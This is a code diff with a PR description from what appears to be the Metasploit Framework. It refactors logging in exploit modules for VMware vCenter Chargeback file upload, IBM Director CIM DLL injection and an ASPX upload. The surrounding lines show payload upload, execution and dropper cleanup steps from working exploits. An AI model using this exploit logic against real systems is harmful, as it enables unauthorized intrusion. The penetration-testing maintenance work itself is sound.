-    print_status("#{@peer} - Writing #{aspx.length} bytes through #{attack_url}...")
-    print_status("#{@peer} - Wrting over #{uri_path}#{@upload_random}.aspx")
+    print_status("#{peer} - Writing #{aspx.length} bytes through #{attack_url}...")
+    print_status("#{peer} - Wrting over #{uri_path}#{@upload_random}.aspx")
 
     res = send_request_cgi({
       'uri'          => attack_url,
@@ -200,12 +197,12 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 20)
 
     if (! res)
-      print_error("#{@peer} - Deletion failed at #{attack_url} [No Response]")
+      print_error("#{peer} - Deletion failed at #{attack_url} [No Response]")
       return
     elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/)
-      print_status("#{@peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
+      print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
     else
-      print_status("#{@peer} - Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]")
+      print_status("#{peer} - Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]")
     end
     handler
   end

--- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb
+++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb
@@ -67,17 +67,17 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     if cli.type != 'meterpreter'
-      print_error("#{@peer} - Meterpreter not used. Please manually remove #{@dropper}")
+      print_error("#{peer} - Meterpreter not used. Please manually remove #{@dropper}")
       return
     end
 
     cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
 
     begin
-      print_status("#{@peer} - Searching: #{@dropper}")
+      print_status("#{peer} - Searching: #{@dropper}")
       files = cli.fs.file.search("\\", @dropper)
       if not files or files.empty?
-        print_error("#{@peer} - Unable to find #{@dropper}. Please manually remove it.")
+        print_error("#{peer} - Unable to find #{@dropper}. Please manually remove it.")
         return
       end
 
@@ -85,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote
         print_warning("Deleting: #{f['path'] + "\\" + f['name']}")
         cli.fs.file.rm(f['path'] + "\\" + f['name'])
       }
-      print_good("#{@peer} - #{@dropper} deleted")
+      print_good("#{peer} - #{@dropper} deleted")
       return
     rescue ::Exception => e
-      print_error("#{@peer} - Unable to delete #{@dropper}: #{e.message}")
+      print_error("#{peer} - Unable to delete #{@dropper}: #{e.message}")
     end
   end
 
@@ -129,9 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Uploading JSP to execute the payload")
+    print_status("#{peer} - Uploading JSP to execute the payload")
 
     exe = payload.encoded_exe
     exe_filename = rand_text_alpha(8) + ".exe"
@@ -145,10 +143,10 @@ class Metasploit3 < Msf::Exploit::Remote
       register_files_for_cleanup(exe_filename)
       @dropper = dropper_filename
     else
-      fail_with(Failure::Unknown, "#{@peer} - JSP upload failed")
+      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
     end
 
-    print_status("#{@peer} - Executing payload")
+    print_status("#{peer} - Executing payload")
     send_request_cgi(
     {
       'uri'    => normalize_uri("cbmui", "images", dropper_filename),

--- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
+++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
@@ -286,9 +286,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll")
 
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Injecting DLL...")
+    print_status("#{peer} - Injecting DLL...")
 
     res = send_request_cgi({
       'uri'          => "/CIMListener/#{exploit_unc}#{share_name}\\#{basename}.dll",
@@ -304,9 +302,9 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res and res.code == 200 and res.body =~ /CIMVERSION/
-      print_status"#{@peer} - Then injection seemed to work..."
+      print_status"#{peer} - Then injection seemed to work..."
     else
-      fail_with(Failure::Unknown, "#{@peer} - Unexpected response")
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response")
     end
   end
 


### PR DESCRIPTION
The HttpClient mixin has a peer() method, therefore these modules should not have to make their own. Also new module writers won't repeat the same old code again.
